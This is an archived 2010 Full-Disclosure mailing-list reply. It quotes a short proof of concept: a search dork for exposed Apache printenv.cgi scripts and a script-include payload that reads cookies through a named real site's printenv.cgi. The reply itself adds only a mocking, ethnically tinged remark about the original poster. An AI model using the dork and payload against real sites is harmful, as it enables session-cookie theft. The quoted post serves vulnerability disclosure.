[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-disclosure] apache default printenv.cgi script hijacking
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: Re: [Full-disclosure] apache default printenv.cgi script hijacking
- From: Eyeballing Weev <eyeballing.weev@xxxxxxxxx>
- Date: Wed, 08 Dec 2010 10:05:17 -0500
An Asian MustLive?
On 12/08/2010 03:44 AM, sec yun wrote:
> <code>
> dork: inurl:cgi-bin/printenv
> <script src=http://ttzhibo.com/cgi-bin/printenv.cgi></script>
> <script>alert(HTTP_COOKIE)</script>
> </code>
> From wolegequ@wooyun <mailto:wolegequ@wooyun>
> http://www.wooyun.org/bugs/wooyun-2010-0584
> WooYun is a connection platform for vendors and security researchers
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/